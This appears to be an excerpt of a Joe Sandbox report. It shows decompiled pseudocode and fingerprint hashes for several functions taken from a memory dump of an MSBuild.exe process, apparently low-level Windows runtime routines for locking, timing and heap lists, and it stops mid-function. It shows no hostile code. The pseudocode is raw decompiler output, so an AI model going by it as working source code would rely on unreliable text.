                                            						_t102 = _v16;
                                            						if( *_t58 != 0) {
                                            							_t58 = E010D8ED6(_t102, _t98);
                                            						}
                                            						_t76 = _v44;
                                            						E01022280(_t58, _v44);
                                            						E0102DD82(_v44, _t102, _t98);
                                            						E0102B944(_t102, _v5);
                                            						return E0101FFB0(_t76, _t98, _t76);
                                            					}
                                            					_t99 = 0x7ffe03b0;
                                            					do {
                                            						_t103 = 0x7ffe0010;
                                            						do {
                                            							_t67 =  *0x10f8628; // 0x0
                                            							_v28 = _t67;
                                            							_t68 =  *0x10f862c; // 0x0
                                            							_v32 = _t68;
                                            							_v24 =  *((intOrPtr*)(_t99 + 4));
                                            							_v20 =  *_t99;
                                            							while(1) {
                                            								_t97 =  *0x7ffe000c;
                                            								_t90 =  *0x7FFE0008;
                                            								if(_t97 ==  *_t103) {
                                            									goto L10;
                                            								}
                                            								asm("pause");
                                            							}
                                            							L10:
                                            							_t79 = _v24;
                                            							_t99 = 0x7ffe03b0;
                                            							_v12 =  *0x7ffe03b0;
                                            							_t72 =  *0x7FFE03B4;
                                            							_t103 = 0x7ffe0010;
                                            							_v36 = _t72;
                                            						} while (_v20 != _v12 || _t79 != _t72);
                                            						_t73 =  *0x10f8628; // 0x0
                                            						_t105 = _v28;
                                            						_t80 =  *0x10f862c; // 0x0
                                            					} while (_t105 != _t73 || _v32 != _t80);
                                            					_t98 = _v40;
                                            					asm("sbb edx, [ebp-0x20]");
                                            					_t88 = _t90 - _v12 - _t105;
                                            					_t75 = _a4;
                                            					asm("sbb edx, eax");
                                            					_t31 = _t98 + 0xc8; // 0x10cfb53
                                            					_t101 = _t31;
                                            					 *_t101 = _t88;
                                            					_t101[1] = _t97;
                                            					goto L15;
                                            				}
                                            			}

                                            Memory Dump Source
                                            • Source File: 00000003.00000002.379547929.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_fe0000_MSBuild.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 2b830bfa39e3ecc8cc8858452a08ec897f93eb393c886c72c89be990537068c6
                                            • Instruction ID: 7d4e0ea1ca8ec6bd75849ad5aabde355f3e1e60aed6c2e43fba0ee60ebc81860
                                            • Opcode Fuzzy Hash: 2b830bfa39e3ecc8cc8858452a08ec897f93eb393c886c72c89be990537068c6
                                            • Instruction Fuzzy Hash: 7551A171E0162ADFCB15DFA8C480AAEFBF1BF48310F24819AD595AB345DB71AD44CB90
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 96%
                                            			E0101EF40(intOrPtr __ecx) {
                                            				char _v5;
                                            				char _v6;
                                            				char _v7;
                                            				char _v8;
                                            				signed int _v12;
                                            				intOrPtr _v16;
                                            				intOrPtr _v20;
                                            				void* __ebx;
                                            				void* __edi;
                                            				void* __esi;
                                            				void* __ebp;
                                            				intOrPtr _t58;
                                            				char _t59;
                                            				signed char _t69;
                                            				void* _t73;
                                            				signed int _t74;
                                            				char _t79;
                                            				signed char _t81;
                                            				signed int _t85;
                                            				signed int _t87;
                                            				intOrPtr _t90;
                                            				signed char* _t91;
                                            				void* _t92;
                                            				signed int _t94;
                                            				void* _t96;
                                            
                                            				_t90 = __ecx;
                                            				_v16 = __ecx;
                                            				if(( *(__ecx + 0x14) & 0x04000000) != 0) {
                                            					_t58 =  *((intOrPtr*)(__ecx));
                                            					if(_t58 != 0xffffffff &&  *((intOrPtr*)(_t58 + 8)) == 0) {
                                            						E01009080(_t73, __ecx, __ecx, _t92);
                                            					}
                                            				}
                                            				_t74 = 0;
                                            				_t96 =  *0x7ffe036a - 1;
                                            				_v12 = 0;
                                            				_v7 = 0;
                                            				if(_t96 > 0) {
                                            					_t74 =  *(_t90 + 0x14) & 0x00ffffff;
                                            					_v12 = _t74;
                                            					_v7 = _t96 != 0;
                                            				}
                                            				_t79 = 0;
                                            				_v8 = 0;
                                            				_v5 = 0;
                                            				while(1) {
                                            					L4:
                                            					_t59 = 1;
                                            					L5:
                                            					while(1) {
                                            						if(_t59 == 0) {
                                            							L12:
                                            							_t21 = _t90 + 4; // 0x7709c21e
                                            							_t87 =  *_t21;
                                            							_v6 = 0;
                                            							if(_t79 != 0) {
                                            								if((_t87 & 0x00000002) != 0) {
                                            									goto L19;
                                            								}
                                            								if((_t87 & 0x00000001) != 0) {
                                            									_v6 = 1;
                                            									_t74 = _t87 ^ 0x00000003;
                                            								} else {
                                            									_t51 = _t87 - 2; // -2
                                            									_t74 = _t51;
                                            								}
                                            								goto L15;
                                            							} else {
                                            								if((_t87 & 0x00000001) != 0) {
                                            									_v6 = 1;
                                            									_t74 = _t87 ^ 0x00000001;
                                            								} else {
                                            									_t26 = _t87 - 4; // -4
                                            									_t74 = _t26;
                                            									if((_t74 & 0x00000002) == 0) {
                                            										_t74 = _t74 - 2;
                                            									}
                                            								}
                                            								L15:
                                            								if(_t74 == _t87) {
                                            									L19:
                                            									E01002D8A(_t74, _t90, _t87, _t90);
                                            									_t74 = _v12;
                                            									_v8 = 1;
                                            									if(_v7 != 0 && _t74 > 0x64) {
                                            										_t74 = _t74 - 1;
                                            										_v12 = _t74;
                                            									}
                                            									_t79 = _v5;
                                            									goto L4;
                                            								}
                                            								asm("lock cmpxchg [esi], ecx");
                                            								if(_t87 != _t87) {
                                            									_t74 = _v12;
                                            									_t59 = 0;
                                            									_t79 = _v5;
                                            									continue;
                                            								}
                                            								if(_v6 != 0) {
                                            									_t74 = _v12;
                                            									L25:
                                            									if(_v7 != 0) {
                                            										if(_t74 < 0x7d0) {
                                            											if(_v8 == 0) {
                                            												_t74 = _t74 + 1;
                                            											}
                                            										}
                                            										_t38 = _t90 + 0x14; // 0x0
                                            										_t39 = _t90 + 0x14; // 0x0
                                            										_t85 = ( *_t38 ^ _t74) & 0x00ffffff ^  *_t39;
                                            										if( *((intOrPtr*)( *[fs:0x30] + 0x64)) == 1) {
                                            											_t85 = _t85 & 0xff000000;
                                            										}
                                            										 *(_t90 + 0x14) = _t85;
                                            									}
                                            									 *((intOrPtr*)(_t90 + 0xc)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
                                            									 *((intOrPtr*)(_t90 + 8)) = 1;
                                            									return 0;
                                            								}
                                            								_v5 = 1;
                                            								_t87 = _t74;
                                            								goto L19;
                                            							}
                                            						}
                                            						_t94 = _t74;
                                            						_v20 = 1 + (0 | _t79 != 0x00000000) * 2;
                                            						if(_t74 == 0) {
                                            							goto L12;
                                            						} else {
                                            							_t91 = _t90 + 4;
                                            							goto L8;
                                            							L9:
                                            							while((_t81 & 0x00000001) != 0) {
                                            								_t69 = _t81;
                                            								asm("lock cmpxchg [edi], edx");
                                            								if(_t69 != _t81) {
                                            									_t81 = _t69;
                                            									continue;
                                            								}
                                            								_t90 = _v16;
                                            								goto L25;
                                            							}
                                            							asm("pause");
                                            							_t94 = _t94 - 1;
                                            							if(_t94 != 0) {
                                            								L8:
                                            								_t81 =  *_t91;
                                            								goto L9;
                                            							} else {
                                            								_t90 = _v16;
                                            								_t79 = _v5;
                                            								goto L12;
                                            							}
                                            						}
                                            					}
                                            				}
                                            			}





























                                            Memory Dump Source
                                            • Source File: 00000003.00000002.379547929.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_fe0000_MSBuild.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: fbecc144452e6e9740e37df579310400ca1de53fcc592e2907188de4c37816b0
                                            • Instruction ID: e77c935eb47595bf3983dcbabc77cb48e0fe41d86bb932275777836fdef34780
                                            • Opcode Fuzzy Hash: fbecc144452e6e9740e37df579310400ca1de53fcc592e2907188de4c37816b0
                                            • Instruction Fuzzy Hash: 7551E630A0424ADFEB66CB6CC0947AEBBF1AF05314F1481ECE9C597286C379A989C751
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 84%
                                            			E010D740D(intOrPtr __ecx, signed short* __edx, intOrPtr _a4) {
                                            				signed short* _v8;
                                            				intOrPtr _v12;
                                            				intOrPtr _t55;
                                            				void* _t56;
                                            				intOrPtr* _t66;
                                            				intOrPtr* _t69;
                                            				void* _t74;
                                            				intOrPtr* _t78;
                                            				intOrPtr* _t81;
                                            				intOrPtr* _t82;
                                            				intOrPtr _t83;
                                            				signed short* _t84;
                                            				intOrPtr _t85;
                                            				signed int _t87;
                                            				intOrPtr* _t90;
                                            				intOrPtr* _t93;
                                            				intOrPtr* _t94;
                                            				void* _t98;
                                            
                                            				_t84 = __edx;
                                            				_t80 = __ecx;
                                            				_push(__ecx);
                                            				_push(__ecx);
                                            				_t55 = __ecx;
                                            				_v8 = __edx;
                                            				_t87 =  *__edx & 0x0000ffff;
                                            				_v12 = __ecx;
                                            				_t3 = _t55 + 0x154; // 0x154
                                            				_t93 = _t3;
                                            				_t78 =  *_t93;
                                            				_t4 = _t87 + 2; // 0x2
                                            				_t56 = _t4;
                                            				while(_t78 != _t93) {
                                            					if( *((intOrPtr*)(_t78 + 0x14)) != _t56) {
                                            						L4:
                                            						_t78 =  *_t78;
                                            						continue;
                                            					} else {
                                            						_t7 = _t78 + 0x18; // 0x18
                                            						if(E0105D4F0(_t7, _t84[2], _t87) == _t87) {
                                            							_t40 = _t78 + 0xc; // 0xc
                                            							_t94 = _t40;
                                            							_t90 =  *_t94;
                                            							while(_t90 != _t94) {
                                            								_t41 = _t90 + 8; // 0x8
                                            								_t74 = E0104F380(_a4, _t41, 0x10);
                                            								_t98 = _t98 + 0xc;
                                            								if(_t74 != 0) {
                                            									_t90 =  *_t90;
                                            									continue;
                                            								}
                                            								goto L12;
                                            							}
                                            							_t82 = L01024620(_t80,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x18);
                                            							if(_t82 != 0) {
                                            								_t46 = _t78 + 0xc; // 0xc
                                            								_t69 = _t46;
                                            								asm("movsd");
                                            								asm("movsd");
                                            								asm("movsd");
                                            								asm("movsd");
                                            								_t85 =  *_t69;
                                            								if( *((intOrPtr*)(_t85 + 4)) != _t69) {
                                            									L20:
                                            									_t82 = 3;
                                            									asm("int 0x29");
                                            								}
                                            								 *((intOrPtr*)(_t82 + 4)) = _t69;
                                            								 *_t82 = _t85;
                                            								 *((intOrPtr*)(_t85 + 4)) = _t82;
                                            								 *_t69 = _t82;
                                            								 *(_t78 + 8) =  *(_t78 + 8) + 1;
                                            								 *(_v12 + 0xdc) =  *(_v12 + 0xdc) | 0x00000010;
                                            								goto L11;
                                            							} else {
                                            								L18:
                                            								_push(0xe);
                                            								_pop(0);
                                            							}
                                            						} else {
                                            							_t84 = _v8;
                                            							_t9 = _t87 + 2; // 0x2
                                            							_t56 = _t9;
                                            							goto L4;
                                            						}
                                            					}
                                            					L12:
                                            					return 0;
                                            				}
                                            				_t10 = _t87 + 0x1a; // 0x1a
                                            				_t78 = L01024620(_t80,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t10);
                                            				if(_t78 == 0) {
                                            					goto L18;
                                            				} else {
                                            					_t12 = _t87 + 2; // 0x2
                                            					 *((intOrPtr*)(_t78 + 0x14)) = _t12;
                                            					_t16 = _t78 + 0x18; // 0x18
                                            					E0104F3E0(_t16, _v8[2], _t87);
                                            					 *((short*)(_t78 + _t87 + 0x18)) = 0;
                                            					_t19 = _t78 + 0xc; // 0xc
                                            					_t66 = _t19;
                                            					 *((intOrPtr*)(_t66 + 4)) = _t66;
                                            					 *_t66 = _t66;
                                            					 *(_t78 + 8) =  *(_t78 + 8) & 0x00000000;
                                            					_t81 = L01024620(_t80,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x18);
                                            					if(_t81 == 0) {
                                            						goto L18;
                                            					} else {
                                            						_t26 = _t78 + 0xc; // 0xc
                                            						_t69 = _t26;
                                            						asm("movsd");
                                            						asm("movsd");
                                            						asm("movsd");
                                            						asm("movsd");
                                            						_t85 =  *_t69;
                                            						if( *((intOrPtr*)(_t85 + 4)) != _t69) {
                                            							goto L20;
                                            						} else {
                                            							 *((intOrPtr*)(_t81 + 4)) = _t69;
                                            							 *_t81 = _t85;
                                            							 *((intOrPtr*)(_t85 + 4)) = _t81;
                                            							 *_t69 = _t81;
                                            							_t83 = _v12;
                                            							 *(_t78 + 8) = 1;
                                            							 *(_t83 + 0xdc) =  *(_t83 + 0xdc) | 0x00000010;
                                            							_t34 = _t83 + 0x154; // 0x1ba
                                            							_t69 = _t34;
                                            							_t85 =  *_t69;
                                            							if( *((intOrPtr*)(_t85 + 4)) != _t69) {
                                            								goto L20;
                                            							} else {
                                            								 *_t78 = _t85;
                                            								 *((intOrPtr*)(_t78 + 4)) = _t69;
                                            								 *((intOrPtr*)(_t85 + 4)) = _t78;
                                            								 *_t69 = _t78;
                                            								 *(_t83 + 0xdc) =  *(_t83 + 0xdc) | 0x00000010;
                                            							}
                                            						}
                                            						goto L11;
                                            					}
                                            				}
                                            				goto L12;
                                            			}






















                                            Memory Dump Source
                                            • Source File: 00000003.00000002.379547929.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_fe0000_MSBuild.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 01a4d08349e29d22493120a27b3d49beb444160764ac4f0ac8d9a4757e3060ec
                                            • Instruction ID: 21d555c8add9ba4513d7168c31c794a1b3a7d8eab8685958cfbc9a31141caa70
                                            • Opcode Fuzzy Hash: 01a4d08349e29d22493120a27b3d49beb444160764ac4f0ac8d9a4757e3060ec
                                            • Instruction Fuzzy Hash: 90518D71600646EFDB16CF18C480A96BBF5FF45308F54C0AAE948DF256E7B1E946CB90
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 97%
                                            			E01032990() {
                                            				signed int* _t62;
                                            				signed int _t64;
                                            				intOrPtr _t66;
                                            				signed short* _t69;
                                            				intOrPtr _t76;
                                            				signed short* _t79;
                                            				void* _t81;
                                            				signed int _t82;
                                            				signed short* _t83;
                                            				signed int _t87;
                                            				intOrPtr _t91;
                                            				void* _t98;
                                            				signed int _t99;
                                            				void* _t101;
                                            				signed int* _t102;
                                            				void* _t103;
                                            				void* _t104;
                                            				void* _t107;
                                            
                                            				_push(0x20);
                                            				_push(0x10dff00);
                                            				E0105D08C(_t81, _t98, _t101);
                                            				 *((intOrPtr*)(_t103 - 0x28)) =  *[fs:0x18];
                                            				_t99 = 0;
                                            				 *((intOrPtr*)( *((intOrPtr*)(_t103 + 0x1c)))) = 0;
                                            				_t82 =  *((intOrPtr*)(_t103 + 0x10));
                                            				if(_t82 == 0) {
                                            					_t62 = 0xc0000100;
                                            				} else {
                                            					 *((intOrPtr*)(_t103 - 4)) = 0;
                                            					_t102 = 0xc0000100;
                                            					 *((intOrPtr*)(_t103 - 0x30)) = 0xc0000100;
                                            					_t64 = 4;
                                            					while(1) {
                                            						 *(_t103 - 0x24) = _t64;
                                            						if(_t64 == 0) {
                                            							break;
                                            						}
                                            						_t87 = _t64 * 0xc;
                                            						 *(_t103 - 0x2c) = _t87;
                                            						_t107 = _t82 -  *((intOrPtr*)(_t87 + 0xfe1664));
                                            						if(_t107 <= 0) {
                                            							if(_t107 == 0) {
                                            								_t79 = E0104E5C0( *((intOrPtr*)(_t103 + 0xc)),  *((intOrPtr*)(_t87 + 0xfe1668)), _t82);
                                            								_t104 = _t104 + 0xc;
                                            								__eflags = _t79;
                                            								if(__eflags == 0) {
                                            									_t102 = E010851BE(_t82,  *((intOrPtr*)( *(_t103 - 0x2c) + 0xfe166c)),  *((intOrPtr*)(_t103 + 0x14)), _t99, _t102, __eflags,  *((intOrPtr*)(_t103 + 0x18)),  *((intOrPtr*)(_t103 + 0x1c)));
                                            									 *((intOrPtr*)(_t103 - 0x30)) = _t102;
                                            									break;
                                            								} else {
                                            									_t64 =  *(_t103 - 0x24);
                                            									goto L5;
                                            								}
                                            								goto L13;
                                            							} else {
                                            								L5:
                                            								_t64 = _t64 - 1;
                                            								continue;
                                            							}
                                            						}
                                            						break;
                                            					}
                                            					 *((intOrPtr*)(_t103 - 0x1c)) = _t102;
                                            					__eflags = _t102;
                                            					if(_t102 < 0) {
                                            						__eflags = _t102 - 0xc0000100;
                                            						if(_t102 == 0xc0000100) {
                                            							_t83 =  *((intOrPtr*)(_t103 + 8));
                                            							__eflags = _t83;
                                            							if(_t83 != 0) {
                                            								 *((intOrPtr*)(_t103 - 0x20)) = _t83;
                                            								__eflags =  *_t83 - _t99;
                                            								if( *_t83 == _t99) {
                                            									_t102 = 0xc0000100;
                                            									goto L19;
                                            								} else {
                                            									_t91 =  *((intOrPtr*)( *((intOrPtr*)(_t103 - 0x28)) + 0x30));
                                            									_t66 =  *((intOrPtr*)(_t91 + 0x10));
                                            									__eflags =  *((intOrPtr*)(_t66 + 0x48)) - _t83;
                                            									if( *((intOrPtr*)(_t66 + 0x48)) == _t83) {
                                            										__eflags =  *((intOrPtr*)(_t91 + 0x1c));
                                            										if( *((intOrPtr*)(_t91 + 0x1c)) == 0) {
                                            											L26:
                                            											_t102 = E01032AE4(_t103 - 0x20,  *((intOrPtr*)(_t103 + 0xc)), _t82,  *((intOrPtr*)(_t103 + 0x14)),  *((intOrPtr*)(_t103 + 0x18)),  *((intOrPtr*)(_t103 + 0x1c)));
                                            											 *((intOrPtr*)(_t103 - 0x1c)) = _t102;
                                            											__eflags = _t102 - 0xc0000100;
                                            											if(_t102 != 0xc0000100) {
                                            												goto L12;
                                            											} else {
                                            												_t99 = 1;
                                            												_t83 =  *((intOrPtr*)(_t103 - 0x20));
                                            												goto L18;
                                            											}
                                            										} else {
                                            											_t69 = E01016600( *((intOrPtr*)(_t91 + 0x1c)));
                                            											__eflags = _t69;
                                            											if(_t69 != 0) {
                                            												goto L26;
                                            											} else {
                                            												_t83 =  *((intOrPtr*)(_t103 + 8));
                                            												goto L18;
                                            											}
                                            										}
                                            									} else {
                                            										L18:
                                            										_t102 = E01032C50(_t83,  *((intOrPtr*)(_t103 + 0xc)), _t82,  *((intOrPtr*)(_t103 + 0x14)),  *((intOrPtr*)(_t103 + 0x18)),  *((intOrPtr*)(_t103 + 0x1c)), _t99);
                                            										L19:
                                            										 *((intOrPtr*)(_t103 - 0x1c)) = _t102;
                                            										goto L12;
                                            									}
                                            								}
                                            								L28:
                                            							} else {
                                            								E0101EEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
                                            								 *((intOrPtr*)(_t103 - 4)) = 1;
                                            								 *((intOrPtr*)(_t103 - 0x20)) =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t103 - 0x28)) + 0x30)) + 0x10)) + 0x48));
                                            								_t102 =  *((intOrPtr*)(_t103 + 0x1c));
                                            								_t76 = E01032AE4(_t103 - 0x20,  *((intOrPtr*)(_t103 + 0xc)), _t82,  *((intOrPtr*)(_t103 + 0x14)),  *((intOrPtr*)(_t103 + 0x18)), _t102);
                                            								 *((intOrPtr*)(_t103 - 0x1c)) = _t76;
                                            								__eflags = _t76 - 0xc0000100;
                                            								if(_t76 == 0xc0000100) {
                                            									 *((intOrPtr*)(_t103 - 0x1c)) = E01032C50( *((intOrPtr*)(_t103 - 0x20)),  *((intOrPtr*)(_t103 + 0xc)), _t82,  *((intOrPtr*)(_t103 + 0x14)),  *((intOrPtr*)(_t103 + 0x18)), _t102, 1);
                                            								}
                                            								 *((intOrPtr*)(_t103 - 4)) = _t99;
                                            								E01032ACB();
                                            							}
                                            						}
                                            					}
                                            					L12:
                                            					 *((intOrPtr*)(_t103 - 4)) = 0xfffffffe;
                                            					_t62 = _t102;
                                            				}
                                            				L13:
                                            				return E0105D0D1(_t62);
                                            				goto L28;
                                            			}






















                                            Memory Dump Source
                                            • Source File: 00000003.00000002.379547929.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_fe0000_MSBuild.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 3fb7b9dd6e637312aa96181289d4bfc3b18d8e1fbb44a2c932d22e4b49c04880
                                            • Instruction ID: f0af6efeb8892c4a86db5b2d44815c11d5ed489973ff5ecc63153df3da25ff04
                                            • Opcode Fuzzy Hash: 3fb7b9dd6e637312aa96181289d4bfc3b18d8e1fbb44a2c932d22e4b49c04880
                                            • Instruction Fuzzy Hash: D7516B7190061ADFDF25DF99C880ADEBBB9FF88350F158055E995AB220C3359D52CFA0
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 85%
                                            			E01034BAD(intOrPtr __ecx, short __edx, signed char _a4, signed short _a8) {
                                            				signed int _v8;
                                            				short _v20;
                                            				intOrPtr _v24;
                                            				intOrPtr _v28;
                                            				intOrPtr _v32;
                                            				char _v36;
                                            				char _v156;
                                            				short _v158;
                                            				intOrPtr _v160;
                                            				char _v164;
                                            				intOrPtr _v168;
                                            				void* __ebx;
                                            				void* __edi;
                                            				void* __esi;
                                            				signed int _t45;
                                            				intOrPtr _t74;
                                            				signed char _t77;
                                            				intOrPtr _t84;
                                            				char* _t85;
                                            				void* _t86;
                                            				intOrPtr _t87;
                                            				signed short _t88;
                                            				signed int _t89;
                                            
                                            				_t83 = __edx;
                                            				_v8 =  *0x10fd360 ^ _t89;
                                            				_t45 = _a8 & 0x0000ffff;
                                            				_v158 = __edx;
                                            				_v168 = __ecx;
                                            				if(_t45 == 0) {
                                            					L22:
                                            					_t86 = 6;
                                            					L12:
                                            					E0100CC50(_t86);
                                            					L11:
                                            					return E0104B640(_t86, _t77, _v8 ^ _t89, _t83, _t84, _t86);
                                            				}
                                            				_t77 = _a4;
                                            				if((_t77 & 0x00000001) != 0) {
                                            					goto L22;
                                            				}
                                            				_t8 = _t77 + 0x34; // 0xdce0ba00
                                            				if(_t45 !=  *_t8) {
                                            					goto L22;
                                            				}
                                            				_t9 = _t77 + 0x24; // 0x10f8504
                                            				E01022280(_t9, _t9);
                                            				_t87 = 0x78;
                                            				 *(_t77 + 0x2c) =  *( *[fs:0x18] + 0x24);
                                            				E0104FA60( &_v156, 0, _t87);
                                            				_t13 = _t77 + 0x30; // 0x3db8
                                            				_t85 =  &_v156;
                                            				_v36 =  *_t13;
                                            				_v28 = _v168;
                                            				_v32 = 0;
                                            				_v24 = 0;
                                            				_v20 = _v158;
                                            				_v160 = 0;
                                            				while(1) {
                                            					_push( &_v164);
                                            					_push(_t87);
                                            					_push(_t85);
                                            					_push(0x18);
                                            					_push( &_v36);
                                            					_push(0x1e);
                                            					_t88 = E0104B0B0();
                                            					if(_t88 != 0xc0000023) {
                                            						break;
                                            					}
                                            					if(_t85 !=  &_v156) {
                                            						L010277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t85);
                                            					}
                                            					_t84 = L01024620(0,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v164);
                                            					_v168 = _v164;
                                            					if(_t84 == 0) {
                                            						_t88 = 0xc0000017;
                                            						goto L19;
                                            					} else {
                                            						_t74 = _v160 + 1;
                                            						_v160 = _t74;
                                            						if(_t74 >= 0x10) {
                                            							L19:
                                            							_t86 = E0100CCC0(_t88);
                                            							if(_t86 != 0) {
                                            								L8:
                                            								 *(_t77 + 0x2c) =  *(_t77 + 0x2c) & 0x00000000;
                                            								_t30 = _t77 + 0x24; // 0x10f8504
                                            								E0101FFB0(_t77, _t84, _t30);
                                            								if(_t84 != 0 && _t84 !=  &_v156) {
                                            									L010277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t84);
                                            								}
                                            								if(_t86 != 0) {
                                            									goto L12;
                                            								} else {
                                            									goto L11;
                                            								}
                                            							}
                                            							L6:
                                            							 *(_t77 + 0x36) =  *(_t77 + 0x36) | 0x00004000;
                                            							if(_v164 != 0) {
                                            								_t83 = _t84;
                                            								E01034F49(_t77, _t84);
                                            							}
                                            							goto L8;
                                            						}
                                            						_t87 = _v168;
                                            						continue;
                                            					}
                                            				}
                                            				if(_t88 != 0) {
                                            					goto L19;
                                            				}
                                            				goto L6;
                                            			}



























                                            Memory Dump Source
                                            • Source File: 00000003.00000002.379547929.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_fe0000_MSBuild.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 027368608b02d4afa6ceaa17b6ab4058538b8c13af879c3907556800443e5fdc
                                            • Instruction ID: 252a61dbcdd210b3d86753f4a5f438605cf8504bbaf0b03e011129a954922ab0
                                            • Opcode Fuzzy Hash: 027368608b02d4afa6ceaa17b6ab4058538b8c13af879c3907556800443e5fdc
                                            • Instruction Fuzzy Hash: 7C41BF31A006299BDB61DF68C940BEAB7F8FF45740F0100A5E989AB241DB759E84CB95
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 78%
                                            			E01034D3B(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
                                            				signed int _v12;
                                            				char _v176;
                                            				char _v177;
                                            				char _v184;
                                            				intOrPtr _v192;
                                            				intOrPtr _v196;
                                            				void* __ebx;
                                            				void* __edi;
                                            				void* __esi;
                                            				signed short _t42;
                                            				char* _t44;
                                            				intOrPtr _t46;
                                            				intOrPtr _t50;
                                            				char* _t57;
                                            				intOrPtr _t59;
                                            				intOrPtr _t67;
                                            				signed int _t69;
                                            
                                            				_t64 = __edx;
                                            				_v12 =  *0x10fd360 ^ _t69;
                                            				_t65 = 0xa0;
                                            				_v196 = __edx;
                                            				_v177 = 0;
                                            				_t67 = __ecx;
                                            				_v192 = __ecx;
                                            				E0104FA60( &_v176, 0, 0xa0);
                                            				_t57 =  &_v176;
                                            				_t59 = 0xa0;
                                            				if( *0x10f7bc8 != 0) {
                                            					L3:
                                            					while(1) {
                                            						asm("movsd");
                                            						asm("movsd");
                                            						asm("movsd");
                                            						asm("movsd");
                                            						_t67 = _v192;
                                            						 *((intOrPtr*)(_t57 + 0x10)) = _a4;
                                            						 *(_t57 + 0x24) =  *(_t57 + 0x24) & 0x00000000;
                                            						 *(_t57 + 0x14) =  *(_t67 + 0x34) & 0x0000ffff;
                                            						 *((intOrPtr*)(_t57 + 0x20)) = _v196;
                                            						_push( &_v184);
                                            						_push(_t59);
                                            						_push(_t57);
                                            						_push(0xa0);
                                            						_push(_t57);
                                            						_push(0xf);
                                            						_t42 = E0104B0B0();
                                            						if(_t42 != 0xc0000023) {
                                            							break;
                                            						}
                                            						if(_v177 != 0) {
                                            							L010277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t57);
                                            						}
                                            						_v177 = 1;
                                            						_t44 = L01024620(_t59,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v184);
                                            						_t59 = _v184;
                                            						_t57 = _t44;
                                            						if(_t57 != 0) {
                                            							continue;
                                            						} else {
                                            							_t42 = 0xc0000017;
                                            							break;
                                            						}
                                            					}
                                            					if(_t42 != 0) {
                                            						_t65 = E0100CCC0(_t42);
                                            						if(_t65 != 0) {
                                            							L10:
                                            							if(_v177 != 0) {
                                            								if(_t57 != 0) {
                                            									L010277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t57);
                                            								}
                                            							}
                                            							_t46 = _t65;
                                            							L12:
                                            							return E0104B640(_t46, _t57, _v12 ^ _t69, _t64, _t65, _t67);
                                            						}
                                            						L7:
                                            						_t50 = _a4;
                                            						 *((intOrPtr*)(_t67 + 0x30)) =  *((intOrPtr*)(_t57 + 0x18));
                                            						if(_t50 != 3) {
                                            							if(_t50 == 2) {
                                            								goto L8;
                                            							}
                                            							L9:
                                            							if(E0104F380(_t67 + 0xc, 0xfe5138, 0x10) == 0) {
                                            								 *0x10f60d8 = _t67;
                                            							}
                                            							goto L10;
                                            						}
                                            						L8:
                                            						_t64 = _t57 + 0x28;
                                            						E01034F49(_t67, _t57 + 0x28);
                                            						goto L9;
                                            					}
                                            					_t65 = 0;
                                            					goto L7;
                                            				}
                                            				if(E01034E70(0x10f86b0, 0x1035690, 0, 0) != 0) {
                                            					_t46 = E0100CCC0(_t56);
                                            					goto L12;
                                            				} else {
                                            					_t59 = 0xa0;
                                            					goto L3;
                                            				}
                                            			}

                                            Memory Dump Source
                                            • Source File: 00000003.00000002.379547929.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_fe0000_MSBuild.jbxd
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 94%
                                            			E01018A0A(intOrPtr* __ecx, signed int __edx) {
                                            				signed int _v8;
                                            				char _v524;
                                            				signed int _v528;
                                            				void* _v532;
                                            				char _v536;
                                            				char _v540;
                                            				char _v544;
                                            				intOrPtr* _v548;
                                            				void* __ebx;
                                            				void* __edi;
                                            				void* __esi;
                                            				signed int _t44;
                                            				void* _t46;
                                            				void* _t48;
                                            				signed int _t53;
                                            				signed int _t55;
                                            				intOrPtr* _t62;
                                            				void* _t63;
                                            				unsigned int _t75;
                                            				signed int _t79;
                                            				unsigned int _t81;
                                            				unsigned int _t83;
                                            				signed int _t84;
                                            				void* _t87;
                                            
                                            				_t76 = __edx;
